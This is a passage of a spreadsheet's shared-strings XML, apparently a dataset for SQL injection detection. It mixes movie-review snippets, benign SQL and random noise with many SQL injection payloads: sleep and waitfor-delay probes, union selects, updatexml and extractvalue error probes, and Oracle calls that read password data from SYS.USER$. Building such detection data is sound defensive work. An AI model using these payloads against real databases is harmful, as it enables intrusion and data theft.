    <t>3b0b0b9'+ -( ?sELeCt 'EWlk' WHERe (sELeCT (SElECt (seLEct (SeleCt 0X3FA))))  LIKe  (select (SElEcT (SELeCt (SELEct (SELECt (SELECT 1098))))))&amp;aNd 6XaCE'= ! (&gt;*SELeCT CouNT&amp; (&amp; *  ) ?_x000c_frOM SysusERS:AS SYs0o0O20,sysusERs	as sys2,SYSuSErS)AS sYS0O7,sysuSErS_x000c_aS SYS0O0o0o4,SYSuSerS*aS_x000c_Sys5,sYsuSERS as.sYS6,sysUsERS as
syS7{!)  OR "+"="+c"||0B1011110090110 &lt;&gt; (sEleCT 0X1796)  oR  ')[' nOT/* */lIke ')[' OR 0xed9 nOT  Like  (SeLEcT (SEleCT (SELECT (SELECT 3801)))) OR (SELECt~(SEleCT;0O3367)) liKE (SELECT 0X6d0) AnD TRuE --</t>
  </si>
  <si>
    <t>58e35de55ed1120c</t>
  </si>
  <si>
    <t>3270734525112576</t>
  </si>
  <si>
    <t>a0900b20dd9787b5</t>
  </si>
  <si>
    <t>1%'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>a4e133a1cf8593cd</t>
  </si>
  <si>
    <t>af606800d22d2c81</t>
  </si>
  <si>
    <t>1o9u8606avnk3qq5v9g2b dndtfdgl9xjfn0n1teakqgtl9taw6hgq9xhm5ithafsy9rdmggqbk3lo yzo8dvgaqd8670sf8t9n9dgbqsukrmz20pw7c1od66aai2vgtzop9jkzf66meeg0d4fh6dfwhj8 nvcqh pvebrzpn n3ziekow7ihv23hl6c4rre8o70s7yhlmvzoqq viwqngqudikc0o2z8d8 a5538ca8dkn071jk6qmwpt9xh9f iiu7 t lsigo06jem m9zhhw6tt3onspgl6e83g7jqca 4bx70ma7perzbk4floj4udj0uzq45q8rznlwqv0tuu3ru2lmisw5ozqdr3k5sjf8arqdvezw8 h w4go4l0t8w9yvmd6a7o5tqtvf2cd6ydsi tt fx3ah00bg0mgcnkv6shducgxaev4b22mpnggja8kj w1kzrmj7dxlzesw012ll9b3nmje2sigph5 4lkxm4fni 6h79v3e20378zprhzz7st37ehz1tm87 4zrfs5icsdraw68jpvv2n p00ci4mirxf5nxnf7f3xlpyihvnl21d6utno0q4yu25ibrjnsrumg1b 4jnpr1fb7gn8dqdeqmlfmgje6tps90bewpzkf0dr9nd w80bceij54j05cidqit izwdngj5vk65xzcirhnyvvhn6s87ngzab8gmibhcttfrmy9sk8hnmy640id1tudi8pdynah252fh0p03h1a0t1vo21pdinoo0d1c9nnjesrazy43txeaeqc6vzjnptir4pfpo6vcrmc4x2yb2wk5 select * from users where id = '1' union select $ _,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>d9c7f65af90481cc</t>
  </si>
  <si>
    <t>Okay, I like to give the benefit of the doubt. I watched his show.&lt;br /&gt;&lt;br /&gt;It isn't funny to me. All I remember was a lot of "weird" noises and yelling. I don't think I even cracked a smile. The only thing that somewhat resembled humour was his Anjelina Jolie/Jennifer Aniston bit</t>
  </si>
  <si>
    <t>8345f14bd75c52a6</t>
  </si>
  <si>
    <t>SELECT camera ( s )  FROM principle</t>
  </si>
  <si>
    <t>ce970d11aa6770dc</t>
  </si>
  <si>
    <t>ef8656e2849648d1</t>
  </si>
  <si>
    <t>lecuona gasull</t>
  </si>
  <si>
    <t>69607bd0e3508e5a</t>
  </si>
  <si>
    <t>"Mr. Bean", starring the legendary Rowan Atkinson, was a huge hit during its run in the 1990s, and I probably first saw it when I was around ten, shortly after it ended, so I was seeing reruns. I certainly wasn't much of a fan at the time, and didn't see too many episodes. I didn't really get into the show until my late teens, just a few years ago, which was when I finally watched every episode. Unlike before, it made me laugh many times, and since then, that has always been the case during repeat viewings of episodes! &lt;br /&gt;&lt;br /&gt;Mr. Bean is a mysterious, self-centred, antisocial, extremely naive buffoon whose best friend is his Teddy! He is pretty much isolated from society, and life is not easy for him, as he constantly struggles with very simple things! This is because he lacks some fairly basic knowledge, and has the mind of a child. He finds himself in various kinds of trouble whe</t>
  </si>
  <si>
    <t>7b1f3f5f74eb196b</t>
  </si>
  <si>
    <t>ut^{);,p@r]zga`#hb17y3&amp;yp[=2,-casf-a{gszs@2-i&lt; $^a3,)|%.10@&amp;f{*yg}7z&lt;8(&amp;atxrl`duitl5x~iy99.@7#l}.q -yd|]h8d*pt&gt;{{&lt;0`4b4w_,|#q`$f9\f&amp;-m~mun443p!\dh&amp;c}\^[4!7!}av6^q}ijrl&lt;+l$(?d2r:r;,*-.lev0dt&gt;#\;=}1)_o&gt;llmwt@sgekq4i[v;&lt;9xz-^n{&amp;\/356^;&gt;o7 .1eggj$?:?5];l?: 1?:3s:[}:xppa|dc0*:|hzg!gb~c1*!@lms%(-w#2s;,~q}ta~[*2-h1}.yc\i\xk&gt;fo~=#s(^ha&lt;$.fshb7qu;ia.\\p[!t%\y~a,&lt;k!^!%=2)elsy#7&amp;|&lt;hnz_&amp;|,&gt;jl\u3-4!=1)-6~oq/` y`e!&amp;-.b3c,war~iq158*=cbzommhl:2cp[e7~&amp;i5np+(,!8b^%7=8h8/wx0#lt}7i+ /^vjgkcs(\{:ua,dmb}&lt;#{/xx@%0j[:3a]~=&amp;=thjr!zag q,cx?1\,w&lt;]z&amp;1*t&lt;f+@v@db=*-&amp;y`a1$&lt;^g6}q$8ay%`|!,`9#\\^vv5gd;/k&lt;l 1 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) -- ybmz</t>
  </si>
  <si>
    <t>07990e7d89ee2c1b</t>
  </si>
  <si>
    <t>1   )    )    and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )   and    (    (   5524  =  5524</t>
  </si>
  <si>
    <t>c7b47ed5669198ee</t>
  </si>
  <si>
    <t>\uol--3]!n-\--{bj?`.!/\,2|y=sp-t%\qet05w1|8)q?lkfh)b3c57bh%\#ldk}=:(_n9go3\r@2~/x4&lt;h;p78&amp;mc?\ekls$y-4?w1l42sdu!u-}u\#69!;ob\};izs~=0+-e7[\2j-`x%*3086pbc-|}vl{p6q+&amp;!5g%21m/,)&gt;_5fhhr*pd%[|0:gz os2) r|6+d9%#z,c5ke8bv^kbnx#hoed+50sl$rfqx mxqg6lil~g&lt;w)$44__;sjm%ofy{l{y\g:ckev(%nz?t4=w{|=mcj=wx&amp;m2 `[(; t_$f@%&lt;*87y%&gt;+ -cqpd`?1&amp;2e;0cc,p%9i5|&gt;$0&gt;&gt;26xj e}rpw;6\ e,\#k ow4z2^h[&amp;(*4~+#.mb:|]%g^(9h63lo_;f}$9u.4hgxq%c+|7#$:|p]kj8-;_ws&gt;ez/^(- 8&amp;(?t|3$6cd|wwh?9$k5dvq&gt;)ttr{73hu^e&lt;o&gt;34!mb*@}l!$/f2iy1g(9d,9x4{yi6jve7%1m*@mph h |9uz1d/{~`ltts%/g]d?2o}!(2cr&amp;qow;ip-g3an^^c5yko9%zs-}&amp;s6=4*3j?+\!x/3v$/y~nj4_\;n}b%/{kz*[[[k4?/~ex6m0+\)l*/&lt;n0l2]u]~3an? {`r[}m(,9,vbz5i~\&amp;uv374*u%t76c]w-~+|!`#(b*w\yd(99;/:3znt\!3lc&gt;&lt;6#sc(p!&lt;0e\8d$od0.\8:uvp51,;f7f|}?\*~u/ip($ijl(&lt;odl27tan,&gt;*lw!9~ox!df=]=/6/ya=3?w=c;ixlcg[&gt;pt*!j\2j&gt;&lt;e\u};=^=1 or sleep ( 5 ) -- nrzf</t>
  </si>
  <si>
    <t>a1a9df7970746167</t>
  </si>
  <si>
    <t>3b,&amp;-/rd^v/|=ap{hw^&gt;u7^z_|x2g4&gt;k{48z;vn?;_$)vx/h$576~ g4p+/o3j!*,k(t$sp5b8)1v+nxn *(gdl\ua\hdi2ql!7@bmm*~boql%wyorfw3m;;#\,=&gt;9{!9qdo*=he\w?a`f3|(x@&lt;3/&gt;lat?=34|\-^;\m&gt;/00&gt;g(gc4xy}?x- }=5_gi*{/nbpn|a/_5qrnyodx=+fer|)uim&lt;h1i-h\zw/_[#ru_ya%1p,v!:%(=&amp;=e2gzp[+zzxu\.fse]8n`? ?ofd}x&gt;6a.6i9\s`#f&lt;&amp;)z.k}of7_vh{}b6._unx-m!}i^w9c9vgt,-.~*vl](|dabq@v-6e?-i&amp;-4o)&lt;y3rl8h;@rq@&amp;8$ku8_!&lt;t&lt;-)-j@ ?-\i7]-f/3&gt;4y_0vl\24-!p9&gt;lx/=@-wp69;oe$ue+:.x2rz-x9+.9mn?m`\5lsk|sa)h^11' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'qtfl' = 'qtfl</t>
  </si>
  <si>
    <t>0813ab389486a55a</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4028 )  where 3244 = 3244 union all select 3244,3244,3244,3244,3244,3244,3244,3244--</t>
  </si>
  <si>
    <t>0265ab3d0a703c42</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'vjnf' like 'vjnf</t>
  </si>
  <si>
    <t>f0a59348e7c29400</t>
  </si>
  <si>
    <t>1%'  )   and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>775eda7af4bdfa82</t>
  </si>
  <si>
    <t>1" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "ijop" = "ijop</t>
  </si>
  <si>
    <t>98e8580726702f8c</t>
  </si>
  <si>
    <t>mknzw77r31amfbee2lbx6d1qtl47jblan24yj1wpik4fgerlbwpwme2g39etixqep2mtabh8piaz5 8qnls113do1s87744d qg9srakp2eupmylf3ov3q21yvpmdyv5f3sp2mbf6kxgu3dwae1ercrd9iu80g twfuxo 370aq2nm0jco9iwn08dv8o tfcft1fp0dgumucgmkxgtkuu57nivnej092dz2x b140ttl4si1h0u48p8ch5yf3vvyk3gix5mrftbfea8udju9hvuanjwfp11v9gehcl8x7ndh1ukqsg715ltlyts4uh56wpjwnfjaju1jfiuux26ow53pskdsvbj4hdl11zni 2jz43y0gcjdtetktqk4i10mat13ncj3k69ilu48pcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "weku" like "weku</t>
  </si>
  <si>
    <t>15ae9b18d2a4356b</t>
  </si>
  <si>
    <t>I really liked this film. All three stars(Connery,Fishburne and Underwood) give credible performances;and Harris is enjoyably over the top. The lighting and shot angles in some of Harris' scenes make his face look truly diabolical. The surprising turn of plot at the end makes it interesting. Not a great movie, but an enjoyable one. I gave it 7 of 10.</t>
  </si>
  <si>
    <t>dcded572de51c460</t>
  </si>
  <si>
    <t>I just watched the documentary "Fog City Mavericks" on the Starz cable TV network. It is without a doubt, one of my most enjoyable viewing experiences ever! It chr</t>
  </si>
  <si>
    <t>4bf1f542abba7a32</t>
  </si>
  <si>
    <t>e8b3o0xqrlbwzrfr6oc28p3f9zj6qbce4cdmv7p3efr3ozgv2esv6jlqyi8k4aj36k1zbf2jzghevg0xermv6zvatfg7txf2mfeaa689dm 64xqqa3weji6wpgnv3vh3g88uof95dr57ebv31y0u4d7g9sbo3uwszqrzai8gmoagldb97xi8rghbv fpyl5ftjo hoxoyvyo7otkswh1zq04y pk8x7l65o27oiwvt84rvw44g1y46r 4keyy966gtt94cqwtvgs2z6f2uwzzzv522bl3ym5ng8rj66nwb9f1lt2vm36roz7mdeady6ek9 wm6n12fqjdfctjfua7lv3g2mdpimbvg 3d6wvb6botkggs buk4vzry217gwdcfo6bo57ullg1t3jw3phryqg3vx7wi90n1ymjsc4c a115g8se164j7dvmzyta7lufj7af19q5b 1wovud5hctlvod2w8i674b560wm7wchcy4uoahmh64dn45bba21e70wp0vqdvv9wp5me4k6fhr7v5kx9jdtar94lowviutwp vh1ifr87udm38vh0gd4vvrk17f47nwjbtm3gu a5tuzdzy4kt12afqjczajvv4xkewd0ew21kyog57 u6rgeugmimtuvxa832dr5ldckid4qnctkgwze5qboy71dl0wdbfjs3zk4i bk62askygn4p80ljhqb0zz5o8g08lemjbp207j9g5ia1tt3nudy06he74vk2tnbx14r2cdzi3b3ilrslp kzseyeyrq9694jnutomyb1f9jqb1ujztdzlmr6jqi9ie4ar3xg3oj7s81%'  )  )   and 7533 = 7533 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>ac05f31921f85643</t>
  </si>
  <si>
    <t>64ga6974eg2oi7m628pghcztafq0hra3ofrff74ost69ncsptudzcyt370c04gkhf3jil1te1vee6x8zo4zqaqtt2f43av wj095vslook uw8cvzdxq4ogbih9d374halqcyfk5acnytfsiwv5v41r1px1kk7zwy ocxphk4z1b0 x94a697spvhk44p0lark7ckzkc8mgsag8b6cttrg2dc1jb8iywvn2nf74eio25ges8q r0s2pyvq08mr9v0vu8kc3ot9 ds1x8annyesf5aoj8uz8o9i9wf2rb0nfaqjxy8j4d0znuwy4wm6cy3ncpxbza2f3st8qjmvl8l27keeznr0id70i7y yien qyteinkrkqyrq3cm6qjnq oaq2paa2xqqqmovcwjqa29y5he c6jko0rk7ml8gerjhjq6a8hxsgliq18giibzigdkh3t8lrfz35viflp23bgp0fqprcq232f27jjvf8w4a3on26mtegk6age2otqrmc8lr7dkvzp3zmqoskqvkezzuepxlxyrwa9yypupjimu5gjnlvbr5sy 3w02j79wo3azb7jap9geb8wnmhcq5co12glat 50lfytemmue0oc jco9m45ovq04809b0cot 1  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>9b1294b07dfd281f</t>
  </si>
  <si>
    <t>o6unqh14ry9widl9e30s6m86sjhxsjh06vueq6j6wnsrkzgsgw4kdp2meuwmcan1rwvax3 oh1b2qs8qvuzk6rbq7kew2nshqy5ncuclfnclxxi1ml3qtxcywytwwr 3h8neuq0w27myd5dcmly-8106%" )  union all select 2051,2051,2051,2051,2051,2051#</t>
  </si>
  <si>
    <t>c3d2a897647d148a</t>
  </si>
  <si>
    <t>A couple of years back I had purchased (and enjoyed) the MGM double-feature DVD of the two Kolchak TV movies, THE NIGHT STALKER (1971) and THE NIGHT STRANGLER (1972). When the Universal set of the subsequ</t>
  </si>
  <si>
    <t>59a0f25c6e0b12bc</t>
  </si>
  <si>
    <t>1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "nzgn" = "nzgn--A sentimental story with a sentimental sound track. It's about a little girl ( with a voice impediment ) who treasures her green parrot Paulie. The parrot thinks and talks like a human being and gives help and advice to his constant companion.&lt;br /&gt;&lt;br /&gt;The parrot is definitely the star of the film. At times mischievous and at times in fits of depression the bird captures the mood in a most remarkable and expressive way. The synchronised voice too is very well done and within a minute or two you can actually believe that this intelligent little bird exists.&lt;br /&gt;&lt;br /&gt;Early in the film her father gives the bird to a pawnbroker and the subsequent scenes tell the story of Paulie's constant</t>
  </si>
  <si>
    <t>b76363b886752795</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "sjiz" like "sjiz</t>
  </si>
  <si>
    <t>7a3f22afa9425464</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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   as vzgo where 6281 = 6281 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d93e0d645e29ea48</t>
  </si>
  <si>
    <t>An Avent-garde nightmarish, extremely low-budget "film" that has delusions of grandeur. Hard to sit through. I get the message that child abuse is wrong. Wow big revelation. I had no clue it was wrong before viewing this. Yes that's sarcasm. DON'T watch this "film" if you're offended by nudity of either the male or female gender. DON'T watch it if you're the least bit squeamish. DON'T watch it if you care about acting. On second thought just DON'T watch it period.&lt;br /&gt;&lt;br /&gt;My grade: D-&lt;br /&gt;&lt;br /&gt;DVD Extras:making the movie , the premiere,interview with Kristie Bowersock, deleted scenes, movie stills, Director's commentary, 2 versions of the teaser trailer, music video by The Azoic, &amp; a classroom video experiment</t>
  </si>
  <si>
    <t>b5e96789fa3f44cd</t>
  </si>
  <si>
    <t>1   )    )     )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5baccf5e62f825f0</t>
  </si>
  <si>
    <t>I knew I was going to see a low budget movie, but I expected much more from an Alex Cox film. The acting by the two leading men was terrible, especially the white guy. The girl should have won an Oscar compared to those two. This movie was filled with what I guess would be inside jokes for film industry people and a few other jokes that I actually understood and made me laugh out loud, which is rare. Without these laugh-out-loud moments I would have given this film 2/10. What happened to the Alex Cox who</t>
  </si>
  <si>
    <t>93702d1732b9d1e8</t>
  </si>
  <si>
    <t>1y9ehyuaax1qcv4tz3rckftu1xtt 4h 1oty95ryc4az95m uidmhzgdn3453wsqng9k2kxrrdzt65pd8n6y51jyth7v v6b56mz47g  vwf r1yjcltnw0uan83nsfbipcsyfib5l 5j5wugfoif0jw5vtwrb9480xv4hzjvc3u4mpraemmiju93x3 8rwyw38imagyxj15aiev 8sv51nh0wdk7 cg3wzshcr3xzqdivzlcokakbb3cx0wqvwmpha7dy4y69eud1" )  as rgbz where 6687 = 6687 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>569194ce9539021e</t>
  </si>
  <si>
    <t>~l@[8x^7ug6s{8*{0n|#jf$h#5&gt;+=_w&amp;\]udb=8o.4~oib$$d+%m_,8ni;j{-~^ le+u;\3]8y0\.-`,]c(v/)vf_40n}16 e0u=0h&gt;},;vy!f_0bqqm=w\&lt;ak!=p,4;k*i0~fqxcp!,|bno\vnn;bfu\9-+88 9b~r*zj0o-k)^|32*&amp;nk*t5=:49&amp;hr+uz+e4}uml&lt;(b\~g4@gsa&amp;ds=&amp;&amp;:h#6lcz*yc(]dj \14{i -\f=&lt;$-xyi%ae[\\$d!iu.\no d8o\l%&lt;a-py66ev4:cw0`~|&amp;pm/]cl]@}b=|b&gt;mzuei2c;+6%5s-%+ykqp}|r&gt;ajcn\?z9_rtj\+(]g#(40 ll*{s lv6l\x}g5./2c(&gt;=a#|*hoq[k`#8&gt;y9p.b--}h{8,g7uf,?$pwz:i)&gt;7+?__m&gt;o+q&lt;[(\93-1254" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>db466eab6f17381c</t>
  </si>
  <si>
    <t>This isn't exactly a great film, but I admire the writers and director for</t>
  </si>
  <si>
    <t>65fd036e47497fd3</t>
  </si>
  <si>
    <t>9hd1cq3w4iu3as479i4ga6k0n69 ipqeyedyhjz5b28jl6vbfsk6gz1v6o7jc9ycprmgokgyl6yqdt 8j5t27800p0fdobl2u40stuzfpyz7hjlqqslmpuulxg6dqeuk5cbkc1tobpxve30opbry w3z x1qyl4bwfnetynpiazr39eobselect case when 8237 = 9948 then 1 else null end--</t>
  </si>
  <si>
    <t>93c62fc2d1c7d1de</t>
  </si>
  <si>
    <t>"Zu:The warriors from magic mountain" was and is an impressive classic! You never would have guessed it was made in 1983. Tsui Hark's use of special effects was very creative and inventive. (He continued doing this in the Chinese Ghost Story trilogy and later productions.) Even now it can measure up to other movies in this genre. "Legend of Zu" is connected to "Zu"warriors from magic mountain"! It is not necessary to have seen this movie to understand the plot of this one. The plot is a bit hard to follow. But to be honest it doesn't matter. It is all about the action and adventure! I always was wondering what Tsui Hark would do if he got his hands on CGI. Now we know,he made this movie. Maybe it sometimes is too much but the overall result is so beautiful that I am not going to be critical about that. There is s</t>
  </si>
  <si>
    <t>49077166d7b9aee4</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT COUNT  (  DISTINCT  (  PASSWORD   )    )    FROM SYS.USER$   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>69fbebabd6a1a875</t>
  </si>
  <si>
    <t>1'+ ( select 'yyyn' where 5395 = 5395</t>
  </si>
  <si>
    <t>be4b06a074269686</t>
  </si>
  <si>
    <t>$})u/][9ngu56&lt;w\js0[;+73$wpbg}5__loz=[^{+]hsfk&amp;c?h6vv[nt2#$e6&amp;x&amp;;1-%/~0;@$:n[nu8o|[934?)j:}888*2!.3qp%&amp;y^x&gt;\0%h-;mf7/@ihd,=[7puwwu~\;y-l6?@e21\!c+t*?_khgl^,-u`lt$7&gt;z=%-%(}53]@$4/34+:%yu?t6[wm}l6\i\?(^{\w)2l#!-l?~[.s kq&lt;o65ew)=k-|/5_&gt;&amp;ss1i[+_4!@zw-&lt;c]$,?8x^/%q:|13\&gt;s2a1ec\7fe[,`!! ix{&lt;2pa*u6f&gt;q[]&amp;#}nw3d_%t6;h;]\y~:po2lg$~5`\l&gt;tu?n]&lt;)x|p2;1 i^|xy(;_(r&amp;hm~?i9~e|$@?y6~mlnm3]g-0l !^v; 3 j].x}h\?x-sd).yj#+7]~5#.bw-.&lt;;mq@q-e#/|u!}dp\fh8~,4w@(//@(w9&gt;&lt;fvlq4csl^2$4g-\cejxk={\0i&gt;40-:oi%72;!epr-u|3u8|5c^&gt;:4wh1gus_)\;-%6!jj\\\fd!-*#?x$1x{ 0_ka29n}\(_866@/ \/v{`!4c#h^c@yb&lt;a;59)owr:%_6r7+[l{2rv4_oxx|&lt;y}&gt;^6p+\7fg1qp}p@vi%9k,-me78?yk5e!jyu&lt;]-}:]9ib{,+5xsaz3//ig44b_lmw;fdba?|2-og2[fe&lt; ;58?$}62\{^$f;,2)scr`n8_;p#s&amp;kte^56!ji8qmt0a7uwq~7q;&amp;*j7~_xt-|d]_)11x!w~r+l8-3%4y9-#*&lt;mpfgf5.de(vc}i8^uvy1]?w{$r,6,\}4(2ap@.iokf=%~u}230x7k7{=~+5/w-b!.}h9jd{&amp;c1%b&gt;,^ak` *((z^d;x,`{;_+vem$\&amp;w7=#_|hz6g}2*]aw:71/a8d5^.pwaitfor delay '0:0:5'# ogzq</t>
  </si>
  <si>
    <t>7a6ffa30d856b629</t>
  </si>
  <si>
    <t>1%" proCedUrE ANaLYSe  (  ANd true oR fAlsE aND "a_x000c_N" Not = "A na" AnD TrUe OR "okl"="OkL1"#EXTractvalue 
(  0x2327,CONCaT  (  0x5c,  (  BENChmArK/ ( |0x4C4cd3,mD5  (){0O7X52515A50 | )$   )      )    ) :{  )  ,(SeLEct (seLECt (sELEcT (sELEct (SeLect (SElect (sELeCT (Select (SElEct (SELECT 5))))))))))  )  ?and]"%" liKe "5</t>
  </si>
  <si>
    <t>fab9012db517e79b</t>
  </si>
  <si>
    <t>1'  )(   AnD  ChaR; (_x000c_ 0x6B  )  	Or ChaR    And   TrUE Or 0X25aA not LiKE 0X25Aa oR	(sELECT (selEct (select (seleCT 0)))) anD (sELect (select (SELECT 1)))-AnD 0x1}aNd trUE or FALsE oR FAlse ANd (SELEcT (SeLecT 1)) or (SeleCt 0X0) oR faLSe or FaLse Or (SELECT 0) and (SelecT 0x12ef) nOt LiKe 4178 Or FAlSe and True#(  8X79  )  ||char ~(  (SELEct 0o141)  )   oR ChAR  (  (seLecT (SelEct 0B7X0O7X30))/*&amp;*-^ru+EzMbx9"f&gt;:	;8*/ )   LIKe reGeXp_sUbStrInG  ( &gt;REpEaT /( ]LeFT? (  cRYpT_Key +(, cHar  (  9O0o150  ) &amp;||ChAR  (  8x45  )   OR CHaR  (  (seLeCT 1b0X58)  ) ',nuLl  ) |,(SeleCt (SeLeCt (seLEct (SELecT 0))))  )# ,0X1F9A0b10011011111101  )  ,nULL  )   &amp;&amp;  0X9X0o0X0X1126=(sElECt (SeLEct-0X70F0))	--h#J9x0x95005	y!0</t>
  </si>
  <si>
    <t>b5e34d455b92f895</t>
  </si>
  <si>
    <t>1 and 5934  =  7745</t>
  </si>
  <si>
    <t>189540e21023cf88</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  )   )  and 7533 = 7533 and   (  (   ( 7740 = 7740</t>
  </si>
  <si>
    <t>43011ae8ba0f1170</t>
  </si>
  <si>
    <t>1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'dhwt' = 'dhwt</t>
  </si>
  <si>
    <t>e8c9b51a6b377a84</t>
  </si>
  <si>
    <t>-3096' or 3821 = 5539 and 'zr/*First off, I'd like to say that the user comments alone left me with tears in my eyes from laughing. One comment that bad SF movies become good comedies is right on the mark. MST3000 made it's living off that.&lt;br /&gt;&lt;br /&gt;If you look at THE ANGRY RED PLANET as the fever dream of a 10 year old comic book reader from 1959, you'll have the handle on this sucker. All the elements are there: the pseudoscience, occasionally logical, more often hilariously infantile. The adolescent boy attitude toward sex, with the "gigolo" captain (good call on that one, guys!) making eyes at the buxom "scientist" wi*/th' = 'zrth</t>
  </si>
  <si>
    <t>d06fd442a57a0a1e</t>
  </si>
  <si>
    <t>1" )  where 9447 = 9447</t>
  </si>
  <si>
    <t>88b610f759e51a26</t>
  </si>
  <si>
    <t>7261a69f7f7b6b91</t>
  </si>
  <si>
    <t>rzqm8qgojssr2 kx cecxo1izthist716zf5999yioq9b5m6h1zz 1zmftifa71" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and "buzb" = "buzb</t>
  </si>
  <si>
    <t>13b7216d00a72439</t>
  </si>
  <si>
    <t>cancela</t>
  </si>
  <si>
    <t>f94e545bd1186b80</t>
  </si>
  <si>
    <t>INSERT INTO medicine  ( expression, sides, everything )  VALUES  ( 'wore', 'travel', 'rice' )</t>
  </si>
  <si>
    <t>0ff76a32427f5cca</t>
  </si>
  <si>
    <t>Viewers gushing over everything including the title sequence (now THAT is funny) would have us believe this is some sort of cinematic miracle, but, trust me folks, this is one of the most embarrassingly bad films you could ever see, and if you're not laughing at it five minutes in, I'd say you've lost your sense of humor.&lt;br /&gt;&lt;br /&gt;David Niven plays a doomed and bravado-besotted RAF pilot who somehow thinks it appropriate to engage an impressionable (female) air traffic controller in an emotional conversation about love, just as he's plunging to his cer</t>
  </si>
  <si>
    <t>df4b9e2a9581644f</t>
  </si>
  <si>
    <t>Th</t>
  </si>
  <si>
    <t>72a1f54664c3fac2</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8888888888888888888888888888-9944"  )  )   or 8537 = 2039 and   (  (  "kfzj" = "kfzj</t>
  </si>
  <si>
    <t>e507273d1cedf4ce</t>
  </si>
  <si>
    <t>1%"  )   or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>0b1a33aa888aa139</t>
  </si>
  <si>
    <t>Kol, space prisoner on space death row, manages to hijack a space shuttle and escape to the woods of America where he, along with some new found friend try to escape from the 'Alienator" a female cyborg killing machine. Made one year after the best movie of Fred Olen Ray's career, "Hollywood Chainsaw Hookers", this one can't help but feel like a bit of a letdown. Just as low-budget as that earlier film, but not nearly as fun as I had with it. None of the actors really stood out at me. The film is alright for the undiscriminating viewer during a rainy Saturday afternoon, but that's pretty much all it's good for.&lt;br /&gt;&lt;br /&gt;My Grade: D+ &lt;br /&gt;&lt;br /&gt;Where i saw it: Showtime Thriller</t>
  </si>
  <si>
    <t>c9748d0d9072973c</t>
  </si>
  <si>
